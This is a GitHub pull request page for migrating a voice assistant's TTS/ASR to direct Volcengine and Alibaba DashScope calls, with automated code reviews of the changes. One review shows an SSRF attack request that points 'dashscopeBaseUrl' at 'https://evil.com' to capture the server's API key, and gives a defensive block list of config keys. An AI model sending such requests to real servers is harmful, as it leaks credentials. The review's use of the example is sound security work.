feat: migrate TTS providers to backend direct routing #36
Kiritogu wants to merge 13 commits into datawhalechina:dev
This reverts commit 3014403.
Review Summary by Qodo
Migrate TTS/ASR providers to backend direct routing with incremental streaming and voice catalogs
Walkthroughs
Description
- Migrate TTS providers to backend direct routing with official provider endpoints for Volcengine and Alibaba, replacing the unspeech relay
- Implement incremental TTS streaming for assistant responses with TtsStreamSegmenter and chunk-based playback
- Add microphone input to the chat interface and desktop overlay with source-aware listening context tracking
- Implement Alibaba Bailian DashScope ASR integration with realtime WebSocket streaming support
- Add local static voice catalogs for Volcengine and Alibaba providers with a backend voice listing API
- Normalize Alibaba model IDs by removing the alibaba/ prefix in frontend and backend processing
- Prune frontend speech providers to Volcengine, Alibaba, and local audio only, with visibility filtering
- Add comprehensive test coverage for TTS engine relay, ASR integration, provider voice catalogs, and field normalization
- Implement transcript sanitization, language normalization, and browser recognition auto-restart logic
- Add provider field filtering to hide redundant baseUrl configuration when defaults exist
- Update the default speech provider from OpenAI to browser-local-audio-speech
- Add IDE configuration files and a comprehensive development guide (CLAUDE.md)
Diagram
flowchart LR
FE["Frontend<br/>Chat/Settings UI"]
BE["Backend<br/>API Router"]
VC["Volcengine<br/>Official API"]
AC["Alibaba<br/>DashScope API"]
FE -->|"/api/tts/engines"| BE
FE -->|"/api/providers/voices"| BE
FE -->|"/api/asr/stream"| BE
BE -->|"Direct TTS"| VC
BE -->|"Direct TTS/ASR"| AC
FE -->|"Incremental text"| STREAM["TTS Stream<br/>Segmenter"]
STREAM -->|"Chunks"| QUEUE["Chunk Queue<br/>Runner"]
QUEUE -->|"Sequential requests"| BE
File Changes
1. frontend/packages/stage-settings-ui/src/components/AudioSection.vue
Code Review by Qodo
1. Dify/Coze TTS broken
Blocker (can’t start the diff-scoped review)
What I can confirm from the local GitHub Actions event payload
Unblock options (pick one)
With that diff, I’ll produce diff-line-only inline comment commands (with exact |
Code Review Summary
This PR migrates TTS/ASR providers from relying on the unspeech proxy to direct backend routing to Volcengine and Alibaba Cloud endpoints. The implementation is substantial (66 files, 8730+/992-) with solid test coverage for the new backend relay paths and frontend request builders. Two issues warrant attention before merge.
PR Size: XL
Issues Found
| Category | Critical | High | Medium | Low |
|---|---|---|---|---|
| Security | 1 | 0 | 0 | 0 |
| Error Handling | 0 | 1 | 0 | 0 |
| Hygiene | 0 | 0 | 1 | 0 |
Detail
- [SECURITY-VULNERABILITY] SSRF via user-controlled provider URLs: `_resolve_volcengine_tts_url` and `_resolve_alibaba_tts_ws_url` accept arbitrary URLs from the client-supplied `config` dict. A caller can redirect the backend to internal services; if server-side API keys are configured via env vars, those credentials leak to the attacker-controlled endpoint. See inline comment on `tts.py:459`.
- [ERROR-SILENT] Voice catalog load errors silently cached: `_load_local_tts_voices_cached` catches `Exception` and returns `[]`. Combined with `@lru_cache`, a transient read/parse failure is permanently cached as empty until process restart, with zero logging. See inline comment on `registry.py:204`.
- [HYGIENE] `.idea/` directory committed: 8 IDE-specific files (inspection profiles, module config, VCS mappings) are tracked. These should be added to `.gitignore` alongside `.vscode/`.
Review Coverage
- Logic and correctness
- Security (OWASP Top 10)
- Error handling
- Type safety
- Documentation accuracy
- Test coverage
- Code clarity
Automated review by Claude AI
| @router.post("/engines") | ||
| async def run_tts_engine(request: EngineRunRequest) -> StreamingResponse: | ||
| engine_id = _resolve_engine_id(request.engine) | ||
| config = _get_engine_config(engine_id) | ||
| text = _coerce_text(request.data) | ||
| async def run_tts_engine(request: EngineRunRequest) -> Response: | ||
| engine_id = _resolve_tts_engine_id(request.engine) | ||
| runtime_config = _get_tts_engine_config(engine_id) | ||
|
|
||
| text = _extract_tts_input(request.data) | ||
| if not text: | ||
| raise HTTPException(status_code=400, detail="Missing text input") | ||
|
|
||
| engine_type = (config.engine_type or "openai_compat").lower() | ||
| overrides = request.config if isinstance(request.config, dict) else {} | ||
| api_key = _resolve_tts_api_key(runtime_config, overrides) | ||
| if not api_key: | ||
| raise HTTPException(status_code=400, detail="Missing apiKey for TTS provider") | ||
|
|
||
| if engine_id in VOLCENGINE_ENGINE_IDS: | ||
| return await _forward_volcengine_tts( | ||
| runtime_config=runtime_config, | ||
| text=text, | ||
| overrides=overrides, | ||
| api_key=api_key, | ||
| ) | ||
|
|
||
| if engine_type in {"dify_tts", "dify"}: | ||
| stream = await _stream_dify_tts(config, text, overrides) | ||
| return StreamingResponse(stream, media_type="audio/mpeg") | ||
| if engine_id in ALIBABA_ENGINE_IDS: | ||
| return await _forward_alibaba_tts( | ||
| engine_id=engine_id, | ||
| runtime_config=runtime_config, | ||
| text=text, | ||
| overrides=overrides, | ||
| api_key=api_key, | ||
| ) | ||
|
|
||
| if engine_type in {"coze_tts", "coze"}: | ||
| stream = await _stream_coze_tts(config, text, overrides) | ||
| return StreamingResponse(stream, media_type="audio/mpeg") | ||
| payload = _build_unspeech_payload( | ||
| engine_id=engine_id, | ||
| runtime_config=runtime_config, | ||
| text=text, | ||
| overrides=overrides, | ||
| ) | ||
|
|
||
| base_url_override, api_key_override = _resolve_connection_overrides(overrides) | ||
| payload: Dict[str, Any] = {"model": config.model, "input": text} | ||
| payload.update(config.default_params) | ||
| payload.update(sanitize_config(overrides)) | ||
| speech_path = runtime_config.paths.get("speech") if runtime_config.paths else None | ||
| url = runtime_config.base_url.rstrip("/") + normalize_path(speech_path or "/audio/speech") |
1. Dify/coze tts broken 🐞 Bug ✓ Correctness
run_tts_engine no longer routes dify_tts/coze_tts to their dedicated implementations and instead falls through to _build_unspeech_payload, which requires model and voice. Since dify-tts/coze-tts are still configured without a model, these engines will now error (400) or send incompatible payloads to their provider endpoints.
Agent Prompt
## Issue description
`backend/app/api/tts.py` removed the dedicated Dify/Coze TTS execution paths, but `backend/config/engines.yaml` still defines `dify-tts` and `coze-tts` engines that don't have an OpenAI-style `model`/`voice` contract. As a result, requests to these engines will now fail with "Missing model" or send incompatible JSON to `/text-to-audio` / Coze endpoints.
## Issue Context
The PR focuses on direct backend routing for Volcengine/Alibaba. That change unintentionally (or implicitly) altered behavior for other TTS engine types.
## Fix Focus Areas
- backend/app/api/tts.py[76-115]
- backend/app/api/tts.py[376-415]
- backend/config/engines.yaml[138-179]
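If the Dify/Coze engines are meant to keep working, one option is an explicit dispatch on engine type ahead of the generic fallback. This is a minimal sketch under that assumption: the handler functions and `select_tts_handler` are hypothetical stand-ins, not functions from `tts.py`; only the engine-type strings and the `openai_compat` default come from the diff above.

```python
from typing import Callable, Dict, Optional

Handler = Callable[[str], str]


# Hypothetical stand-ins for the dedicated and generic TTS paths.
def handle_dify(text: str) -> str:
    return f"dify:{text}"


def handle_coze(text: str) -> str:
    return f"coze:{text}"


def handle_default(text: str) -> str:
    return f"default:{text}"


# Engine types seen in the removed branches map to dedicated handlers.
ENGINE_TYPE_HANDLERS: Dict[str, Handler] = {
    "dify_tts": handle_dify,
    "dify": handle_dify,
    "coze_tts": handle_coze,
    "coze": handle_coze,
}


def select_tts_handler(engine_type: Optional[str]) -> Handler:
    """Pick a dedicated handler, else fall back to the generic path."""
    key = (engine_type or "openai_compat").lower()
    return ENGINE_TYPE_HANDLERS.get(key, handle_default)
```

With a table like this, dropping an engine type becomes a visible one-line change rather than a side effect of restructuring the route.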
| headers = { | ||
| "Content-Type": "application/json", | ||
| "Authorization": f"Bearer;{api_key}", | ||
| } | ||
| headers.update(runtime_config.headers) |
2. Volcengine auth header typo 🐞 Bug ✓ Correctness
The Volcengine forwarder sets Authorization: Bearer;{api_key} (semicolon) instead of the standard
Bearer format used elsewhere in the backend. This is very likely to cause authentication failures
for all Volcengine TTS requests.
Agent Prompt
## Issue description
Volcengine TTS forwarding sends `Authorization: Bearer;{api_key}` which is inconsistent with the rest of the backend (`Bearer {api_key}`) and is likely an authentication-breaking typo.
## Issue Context
This occurs only in the new direct Volcengine routing path.
## Fix Focus Areas
- backend/app/api/tts.py[574-616]
|
|
||
| def _resolve_aliyun_dashscope_base_url(params: Dict[str, Any], config) -> str: | ||
| explicit_base = str( | ||
| _first_present(params, "base_url", "baseUrl", "dashscope_base_url", "dashscopeBaseUrl") |
[SECURITY-VULNERABILITY] SSRF + credential leakage via unblocked dashscope_base_url / dashscopeBaseUrl override keys.
ASR_BLOCKED_CONFIG_KEYS blocks base_url and baseUrl, but _resolve_aliyun_dashscope_base_url also reads dashscope_base_url and dashscopeBaseUrl from the merged params. These keys are not in the block list, so a client can inject an arbitrary destination URL through the config override dict.
Attack scenario:
- Client sends `{"config": {"dashscopeBaseUrl": "https://evil.com"}}` via the ASR endpoint
- No `dashscopeApiKey` provided → server falls back to `resolve_api_key(config.api_key_env)` (reads `DASHSCOPE_API_KEY` env var)
- Server POSTs to `https://evil.com/compatible-mode/v1/chat/completions` with `Authorization: Bearer <real_api_key>`
- Attacker captures the DashScope API key

Suggested fix: add the extra keys to the block set:
ASR_BLOCKED_CONFIG_KEYS = frozenset(
    {
        "api_key", "apiKey",
        "base_url", "baseUrl",
        "dashscope_base_url", "dashscopeBaseUrl",
        "dashscope_api_key", "dashscopeApiKey",
        "engine", "filename", "file_name",
        "file", "content_type", "mime_type",
    }
)
Alternatively, `_resolve_aliyun_dashscope_base_url` should only read from `config.base_url` (server-side YAML config) and never from client-provided overrides.
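As a complement to the block list, the resolved URL itself could be checked against a host allowlist before any credentials are attached. The following is a sketch under assumptions, not the project's code: `is_allowed_provider_url` and `ALLOWED_PROVIDER_HOSTS` are hypothetical names, and the two hosts are the official endpoints named in the PR description.

```python
from typing import Iterable
from urllib.parse import urlsplit

# Hypothetical allowlist; a real one would come from server-side config.
ALLOWED_PROVIDER_HOSTS = frozenset(
    {"dashscope.aliyuncs.com", "openspeech.bytedance.com"}
)


def is_allowed_provider_url(
    url: str, allowed_hosts: Iterable[str] = ALLOWED_PROVIDER_HOSTS
) -> bool:
    """Return True only for https/wss URLs whose host is allowlisted."""
    try:
        parts = urlsplit(url)
    except ValueError:
        # Malformed URLs (e.g. a broken IPv6 literal) are rejected.
        return False
    if parts.scheme not in {"https", "wss"}:
        return False
    # hostname strips userinfo and port, so "good.com@evil.com" yields "evil.com".
    host = (parts.hostname or "").lower()
    return host in set(allowed_hosts)
```

Checking the parsed hostname rather than a string prefix matters here, since a prefix match would accept `https://dashscope.aliyuncs.com@evil.com/`.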
| async with ws_connect( | ||
| ws_url, | ||
| additional_headers={ | ||
| "Authorization": api_key, |
[LOGIC-BUG] Missing Bearer prefix in Alibaba TTS WebSocket Authorization header.
The DashScope WebSocket streaming synthesis API (/api-ws/v1/inference) expects Authorization: bearer <api_key>. This code sends the raw API key without the prefix, which will cause authentication to fail at runtime.
Compare with the ASR realtime code which correctly uses the prefix:
# asr.py:753 (correct)
"Authorization": f"Bearer {resolved['api_key']}",
Suggested fix:
additional_headers={
    "Authorization": f"Bearer {api_key}",
    "X-DashScope-DataInspection": "enable",
},
|
|
||
| model = ALIYUN_ASR_REALTIME_MODEL | ||
| if not model: | ||
| raise HTTPException(status_code=400, detail="Alibaba Bailian ASR missing model") |
[LOGIC-BUG] Dead code — unreachable model validation.
ALIYUN_ASR_REALTIME_MODEL is a non-empty constant ("qwen3-asr-flash-realtime"), so if not model: on line 516 can never be True. This check is dead code and may mask a real intent (e.g., the model should perhaps come from config or overrides rather than be hardcoded).
Suggested fix — remove the dead branch:
def _resolve_aliyun_dashscope_credentials(config, overrides):
    ...
    model = ALIYUN_ASR_REALTIME_MODEL
    return {
        "params": params,
        "api_key": api_key,
        "model": model,
        "base_url": _resolve_aliyun_dashscope_base_url(params, config),
    }
| try: | ||
| await session.ws.close() | ||
| except Exception: | ||
| pass |
[ERROR-SILENT] _close_aliyun_realtime_session swallows all exceptions without logging.
Two bare except Exception: pass blocks discard errors silently. While cleanup code often ignores errors, the project constitution requires logging — unexpected failures during teardown (e.g., hung reader task, broken pipe) become invisible when debugging production issues.
Suggested fix — add logger.debug so the errors are at least traceable:
async def _close_aliyun_realtime_session(session: AliyunRealtimeSession) -> None:
    if session.reader_task is not None:
        session.reader_task.cancel()
        try:
            await session.reader_task
        except asyncio.CancelledError:
            pass
        except Exception:
            logger.debug("Error awaiting Aliyun reader task during cleanup", exc_info=True)
    try:
        await session.ws.close()
    except Exception:
        logger.debug("Error closing Aliyun WebSocket during cleanup", exc_info=True)
Code Review Summary
This is a large, ambitious PR that migrates TTS/ASR from third-party relay services to direct API integration with Volcengine and Alibaba DashScope, adds real-time streaming ASR, incremental TTS during LLM streaming, and microphone UI controls. The code is generally well-structured with good error handling patterns and comprehensive test coverage for utility functions. However, there is a critical SSRF vulnerability that must be fixed before merge.
PR Size: XL
(8862 additions, 992 deletions, 66 files)
Issues Found
| Category | Critical | High | Medium | Low |
|---|---|---|---|---|
| Security | 1 | — | — | — |
| Logic | — | 1 | 1 | — |
| Error Handling | — | — | 1 | — |
Critical
- [SECURITY-VULNERABILITY] `backend/app/api/asr.py:492`: SSRF + credential leakage via unblocked `dashscope_base_url` / `dashscopeBaseUrl` override keys. Client-provided config overrides can redirect server-side HTTP/WebSocket requests to arbitrary URLs, leaking the server's DashScope API key. The `ASR_BLOCKED_CONFIG_KEYS` block list must be extended to cover these alias keys.
High
- [LOGIC-BUG] `backend/app/api/tts.py:709`: Missing `Bearer` prefix in Alibaba TTS WebSocket `Authorization` header. The DashScope streaming synthesis API expects `Authorization: bearer <key>`, but the code sends the raw key. The ASR code at `asr.py:753` correctly uses `f"Bearer {api_key}"`. This will cause Alibaba CosyVoice TTS to fail with an auth error in production.
Medium
- [LOGIC-BUG] `backend/app/api/asr.py:515-517`: Dead code: `model = ALIYUN_ASR_REALTIME_MODEL` followed by `if not model:` is unreachable since the constant is a non-empty string. May mask intent to make the model configurable.
- [ERROR-SILENT] `backend/app/api/asr.py:832-838`: `_close_aliyun_realtime_session` has two `except Exception: pass` blocks that silently discard errors during cleanup. Should at least use `logger.debug` for production traceability.
Additional Note
The .idea/ directory (JetBrains IDE config) is included in the diff. As noted in the PR checklist, this should be removed from the commit and added to .gitignore.
Review Coverage
- Logic and correctness
- Security (OWASP Top 10)
- Error handling
- Type safety
- Documentation accuracy
- Test coverage
- Code clarity
Automated review by Claude AI
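Overview
Migrates the TTS and ASR modules from the third-party relay service (unspeech) to direct integration with the official Volcengine and Alibaba Cloud DashScope APIs, and adds incremental streaming TTS, a realtime ASR WebSocket, and microphone interaction.

Problem
- … `unspeech.hyp3r.link`, which added latency and a single-point-of-failure risk

Related Issue / PR:
- … `fix/tts-voice-flow`; this PR correctly targets the `dev` branch

Solution
Backend: Implements native API calls for Volcengine and Alibaba Cloud separately (Volcengine uses HTTPS + Base64 JSON to `openspeech.bytedance.com`; Alibaba Cloud uses a three-phase WebSocket protocol to `dashscope.aliyuncs.com`), removing the dependency on the unspeech relay. Adds Alibaba Cloud DashScope realtime ASR (`qwen3-asr-flash-realtime`) with WebSocket streaming recognition. The Provider Registry gains a local voice catalog (JSON files) that filters compatible voices by model.

Frontend: Implements incremental streaming TTS (`TtsStreamSegmenter` segments text by sentence as LLM tokens arrive and synthesizes each segment immediately) and adds several utility modules to split up the logic. The chat interface and desktop client gain a microphone button with mute/unmute states. The speech provider list is trimmed to the 4 providers that are actually integrated.

Changes
Core changes
Backend TTS direct routing (`backend/app/api/tts.py`, +675/-191)
- `_forward_volcengine_tts`: calls the Volcengine TTS API directly, with Bearer token auth and Base64 audio decoding
- `_forward_alibaba_tts`: connects to Alibaba Cloud CosyVoice over WebSocket (three-phase protocol: run-task → continue-task → finish-task)
- … `_stream_dify_tts`, `_stream_coze_tts`) and the old streaming proxy logic

Backend ASR realtime streaming (`backend/app/api/asr.py`, +613/-24)
- … `/compatible-mode/v1/chat/completions` + `input_audio`)
- `AliyunRealtimeSession`: realtime WebSocket ASR (`wss://dashscope.aliyuncs.com/api-ws/v1/realtime`)
- … `-realtime` suffix; batch requests strip it automatically

Provider Registry (`backend/app/services/providers/registry.py`, +225/-4)
- `list_voices` loads the voice list from the local JSON catalog (LRU-cached)
- … `compatible_models` filtering, matched against the currently selected model

Frontend incremental streaming TTS (`speech-output.ts` + new utility modules)
- `TtsStreamSegmenter`: segments streamed LLM tokens on punctuation and special markers
- `runTtsChunkQueue`: synthesizes segments sequentially; on failure, falls back to merging the remaining text
- `tts-chunker.ts`: supports CJK word segmentation (`Intl.Segmenter`), preserves decimals, normalizes ellipses
- `tts-direct-request.ts`: builds direct TTS requests; falls back to the legacy format on a 405

Frontend ASR enhancements (`transcription.ts` + new utility modules)
- … `shouldAutoRestartBrowserRecognition`)
- … `decideCaptureFallback`)
- … `sanitizeTranscript`)
- … `zh` → `zh-CN`; defaults to following `navigator.language`

Frontend UI
- `ChatArea.vue` / `DesktopChatOverlay.vue`: new microphone button (with mute/unmute visual states)
- `App.vue`: wires `onTokenLiteral` / `onTokenSpecial` to drive incremental TTS
- `AudioSection.vue`: language becomes a dropdown; redundant toggles removed
- … `useHttpsScheme` to support microphone permission

Supporting changes
- … `alibaba.json` (CosyVoice voices), `volcengine.json` (Volcengine voices)
- `provider-fallback.ts` / `provider-options.ts`: remove 7 speech providers that are not integrated
- `provider-visibility.ts`: the allowlist keeps only the 4 integrated providers
- `provider-fields.ts`: hides the baseUrl field automatically when a default baseUrl exists
- `websockets` promoted from a dev dependency to a runtime dependency (`pyproject.toml`)
- `engines.yaml` / `providers.yaml` updated to the official API endpoints

Notes
- The `.idea/` directory (JetBrains IDE config) is included in the commits; add it to `.gitignore` or remove it from the commits
- `CLAUDE.md` is committed alongside as a project guide document

Breaking changes
- Functions such as `_stream_dify_tts` and `_stream_coze_tts` have been deleted
- … `openai-audio-speech` changed to `browser-local-audio-speech`
- `run_tts_engine` changed from `StreamingResponse` to `Response` (returns the complete audio buffer)
- … `alibaba/cosyvoice-v1` → `cosyvoice-v1` (prefix removed)

Tests
13 new test files cover the core logic:
Backend tests (4):
- `test_tts_engine_relay.py`: Volcengine payload construction, Alibaba Cloud model normalization, error extraction
- `test_asr_aliyun_dashscope.py`: DashScope URL construction, transcript text extraction, model normalization
- `test_provider_voices_tts.py`: voice catalog loading and model filtering
- `test_provider_catalog_tts_defaults.py`: TTS provider default endpoint validation
- `test_provider_catalog_aliyun_fields.py`: Alibaba Cloud NLS field normalization
- `test_asr_stream_disconnect.py`: WebSocket disconnect detection

Frontend tests (9):
- `audio-direct.test.ts`: direct request construction and legacy format fallback
- `tts-chunker.test.ts`: text segmentation, CJK, special markers
- `tts-stream-segmenter.test.ts`: streaming segmentation and drain
- `tts-streaming-runner.test.ts`: queue execution, error handling
- `browser-recognition-restart.test.ts`: auto-restart logic
- `capture-startup.test.ts`: Worklet fallback logic
- `provider-fields.test.ts` / `provider-visibility.test.ts`: field filtering and visibility
- `transcript-filter.test.ts` / `transcription-language.test.ts`: transcript sanitization and language normalization

Self-testing
- … `pytest backend/tests/test_tts_*.py backend/tests/test_asr_*.py backend/tests/test_provider_*.py`)
- `pnpm -C frontend --filter @whalewhisper/web build` builds successfully

Checklist
- The `.idea/` directory has been removed from the commits or added to `.gitignore`

Auto-generated by Claude AI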
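The incremental TTS segmentation described in the PR description (split streamed LLM tokens at sentence boundaries, keep decimals intact, drain the remainder at the end) can be illustrated roughly as follows. This is a simplified Python sketch for discussion only: `StreamSegmenter` is a hypothetical class, the PR's actual `TtsStreamSegmenter` is TypeScript, and its real rules (special markers, `Intl.Segmenter`, ellipsis normalization) are not reproduced here.

```python
from typing import List

# Punctuation that always ends a segment in this sketch.
_HARD_BREAKS = "。！？!?\n"


class StreamSegmenter:
    """Buffer streamed tokens and emit complete sentences as they form."""

    def __init__(self) -> None:
        self._buffer = ""

    def push(self, token: str) -> List[str]:
        """Append a token and return any segments that are now complete."""
        self._buffer += token
        buf = self._buffer
        segments: List[str] = []
        start = 0
        for i, ch in enumerate(buf):
            if ch in _HARD_BREAKS:
                cut = True
            elif ch == ".":
                # A period ends a sentence only when followed by whitespace,
                # so "3.14" stays whole; at the buffer end we wait for more.
                cut = i + 1 < len(buf) and buf[i + 1].isspace()
            else:
                cut = False
            if cut:
                segment = buf[start:i + 1].strip()
                if segment:
                    segments.append(segment)
                start = i + 1
        self._buffer = buf[start:]
        return segments

    def drain(self) -> List[str]:
        """Flush whatever text is left once the stream has ended."""
        rest = self._buffer.strip()
        self._buffer = ""
        return [rest] if rest else []
```

A caller would feed each token to `push`, send every returned segment to synthesis in order, and call `drain` once the LLM stream finishes.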